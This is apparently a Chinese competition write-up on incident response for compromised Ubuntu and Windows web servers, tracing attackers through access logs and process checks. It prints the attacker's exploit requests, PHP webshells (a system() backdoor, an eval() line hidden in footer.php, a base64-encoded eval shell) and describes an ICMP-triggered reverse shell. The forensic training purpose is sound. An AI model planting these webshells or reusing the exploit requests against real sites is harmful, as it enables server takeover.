信安大赛-应急响应

WTT00112025-01-17 16:02

Ubuntu应急响应

|----|--------------------------------------|
| 1 | 提交攻击者的IP地址 |
| 2 | 识别攻击者使用的操作系统 |
| 3 | 找出攻击者资产收集所使用的平台 |
| 4 | 提交攻击者目录扫描所使用的工具名称 |
| 5 | 提交攻击者首次攻击成功的时间,格式:DD /MM/YY:HH:MM:SS |
| 6 | 找到攻击者写入的恶意后门文件,提交文件名(完整路径)和后门密码 |
| 7 | 找到攻击者隐藏在正常web应用代码中的恶意代码,提交该文件名(完整路径) |
| 8 | 识别系统中存在的恶意程序进程,提交进程名 |
| 9 | 找到文件系统中的恶意程序文件并提交文件名(完整路径) |
| 10 | 简要描述该恶意文件的行为 |

root

1234546

1.提交攻击者的IP地址

一直找日志

是这个

复制代码 
more access.log.1

从192.168.1.5到192.168.1.7就不一样了猜测攻击者是192.168.1.7

复制代码 
192.168.1.5 - - [24/Apr/2022:15:11:48 +0000] "GET /data/captcha/ckstr.php HTTP/1.1" 200 1499 "http://192.168.1.3/message.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"::1 - - [24/Apr/2022:15:11:55 +0000] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.41 (Ubuntu) (internal dummy connection)"
192.168.1.7 - - [24/Apr/2022:15:14:32 +0000] "GET / HTTP/1.1" 408 482 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"
192.168.1.7 - - [24/Apr/2022:15:14:52 +0000] "GET /favicon.ico HTTP/1.1" 200 39411 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"
192.168.1.7 - - [24/Apr/2022:15:15:20 +0000] "GET / HTTP/1.1" 200 3663 "https://www.shodan.io/search?query=php" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"
192.168.1.7 - - [24/Apr/2022:15:15:20 +0000] "GET /templates/default/style/webstyle.css HTTP/1.1" 200 6599 "http://192.168.1.3/" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"

192.168.1.7

2.识别攻击者使用的操作系统
复制代码 
192.168.1.7 - - [24/Apr/2022:15:15:20 +0000] "GET /templates/default/style/webstyle.css HTTP/1.1" 200 6599 "http://192.168.1.3/" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"

Linux x86_64

3.找出攻击者资产收集所使用的平台

shodan.io

日志中找到

shodan.io

4.提交攻击者目录扫描所使用的工具名称
复制代码 
192.168.1.7 - - [24/Apr/2022:15:17:45 +0000] "GET /rHdA9nYoF68B HTTP/1.1" 404 43
4 "-" "DIRSEARCH"

DIRSEARCH

5.提交攻击者首次攻击成功的时间,格式:DD /MM/YY:HH:MM:SS
复制代码 
192.168.1.7 - - [24/Apr/2022:15:25:53 +0000] "GET /shoppingcart.php?a=addshopinggcart&goodsid=1&buynum=2&goodsattr=as%26time=999999999999999999%26uid=/../../../pproc/self/cwd/1.php%26a=1 HTTP/1.1" 200 425 "-" "python-requests/2.23.0"
192.168.1.7 - - [24/Apr/2022:15:25:53 +0000] "POST //data/avatar/upload.php?a=upploadavatar&input=2690b1IhecCIpeAK%2BnPLfbnP3AF%2F9TwHSnAxI%2BAfZ%2BC0xIaO33AMyGeeGhpEIO2WxXowgLJ%2FFbPKzhcd1x4Xlwdbs1Pjg5V6Yy2MSj1yzlbw6eHXc6Mu%2FZ5BSbVUolg2kh400WeVCGgHRYc4Zu8X4VONadz5WOuerWpdPmDRtAjQb8lZjMVQDSPgY&_SERVER%5BHTTP_USER_AGENT%55D%5B%5D=1 HTTP/1.1" 200 296 "-" "python-requests/2.23.0"

这两条日志

先是上传了一个php文件

然后命令执行了

24/Apr/2022:15:25:53

24/04/22:15:25:53

6.找到攻击者写入的恶意后门文件,提交文件名(完整路径)和后门密码

根据上题日志

上传了一个1.php

复制代码 
find / -name 1.php
复制代码 
root@webserver:/# cd /var/www/html/data/avatar
root@webserver:/var/www/html/data/avatar# ls
1.php  images  index.php  lib  upload.php
root@webserver:/var/www/html/data/avatar# cat 1.php
<?php system($_GET[2022]);?>
        #define width 20
        #define height 20

文件名:1.php

后门密码:2022

7.找到攻击者隐藏在正常web应用代码中的恶意代码,提交该文件名(完整路径)
复制代码 
root@webserver:/var/www/html# cat footer.php 
<!-- weblink-->

<div class="weblink">
        <?php
        $dosql->Execute("SELECT * FROM `#@__weblink` WHERE classid=1 AND checkinfo=true ORDER BY orderid,id DESC");
        while($row = $dosql->GetArray())
        {
        ?>
        <a href="<?php echo $row['linkurl']; ?>" target="_blank"><?php echo $row['webname']; ?></a>
        <?php
        }
        ?>
</div>
<!-- /weblink-->
<!-- footer-->
<div class="footer"><?php echo $cfg_copyright ?><br />网站采用 <a href="http://phpmywind.com" target="_blank">PHPMyWind</a> 核心</div>
<!-- /footer-->
<?php
@eval($_POST['catchmeifyoucan'])
echo GetQQ();

//将流量统计代码放在页面最底部
$cfg_countcode;

?>

一个后门

/var/www/html/footer.php

8.识别系统中存在的恶意程序进程,提交进程名
复制代码 
ps aux
复制代码 
cat prism
9.找到文件系统中的恶意程序文件并提交文件名(完整路径)

根据上题

/root/.mal/prism

10.简要描述该恶意文件的行为

根据上上题

等待来自攻击者的ICMP数据包,该数据包包含要回连的主机、端口和密钥,被激活后将/bin/sh回连到主机指定端口,供攻击者执行命令

windows服务器应急响应

首先环境是这样的,比linux应急响应好多了,有图形界面...

1.请提交攻击者攻击成功的第一时间,格式:YY:MM:DD hh:mm:ss

在phpstudy目录下搜索日志文件

省赛用的是别人的工具,只能肉眼观察喽,个人习惯于010,可惜省赛有可能不提供...

这条是登录了管理员账号

29/Apr/2023:22:45:23

23:04:29 10:45:23

2.请提交攻击者的浏览器版本

Firefox/110.0

3.请提交攻击者目录扫描所使用的工具名称

Fuzz Faster U Fool

4.找到攻击者写入的恶意后门文件,提交文件名(完整路径)

C:\phpstudy_pro\WWW\.x.php

5.找到攻击者隐藏在正常web应用代码中的恶意代码,提交该文件名(完整路径)

PD9waHAgQGV2YWwoJF9SRVFVRVNUWyd4J10pOyA/Pg==

C:\phpstudy_pro\WWW\usr\themes\default\post.php

6.请提交内存中可疑进程的PID

在资源监视器里发现有外联

1200

7.请提交攻击者执行过几次修改文件访问权限的命令

2

8.请指出可疑进程采用的自动启动的方式

策略组->计算机配置->Windows设置->脚本(启动/关机)->启动->属性

发现自启动了一个bat脚本

相关推荐
isfox27 分钟前
日志数据链路的 “搬运工”:Flume 分布式采集的组件分工与原理
大数据
纯洁的小魔鬼1 小时前
Centos 用户管理
运维·centos·用户
百胜软件@百胜软件1 小时前
百胜软件×华为云联合赋能,“超级国民品牌”海澜之家新零售加速前行
大数据·华为云·零售
国科安芯2 小时前
MCU外设初始化:为什么参数配置必须优先于使能
网络·单片机·嵌入式硬件·性能优化·硬件工程
居7然2 小时前
MCP协议更新:从HTTP+SSE到Streamable HTTP,大模型通信的进化之路
网络·网络协议·http
蒋星熠2 小时前
MySQL 到 ClickHouse 明细分析链路改造:数据校验、补偿与延迟治理
android·大数据·开发语言·c++·python·mysql·系统架构
yuxb732 小时前
Ansible 实操笔记:Playbook 与变量管理
linux·运维·笔记
不大姐姐AI智能体2 小时前
最新Coze(扣子)智能体工作流:用Coze实现「图片生成-视频制作」全自动化,3分钟批量产出爆款内容
运维·人工智能·经验分享·自动化·aigc·视频
NewCarRen2 小时前
模型驱动的自动驾驶AI系统全生命周期安全保障
人工智能·安全·自动驾驶·汽车
音视频牛哥2 小时前
从感知到执行:人形机器人低延迟视频传输与多模态同步方案解析
网络·人工智能·深度学习·大牛直播sdk·机器人视觉·人形机器人·智能机器人
热门推荐
01UV安装并设置国内源02全球最强模型Grok4,国内已可免费使用!(附教程)032025最新国内服务器可用docker源仓库地址大全(2025年8月更新)04Qwen3-Coder 快速上手教程 | Qwen Code + Claude Code05TRAE Rules 实践:为项目配置 6A 工作流06[已解决]VSCode右键菜单消失恢复07KGG转MP3工具|非KGM文件|解密音频08GPT-5 使用限制与国内升级全攻略(免费 / Plus / Pro)【2025 最新】09Cursor 终端“卡死/无响应”问题的解法10OpenAI重返开源!GPT-OSS本地部署完全指南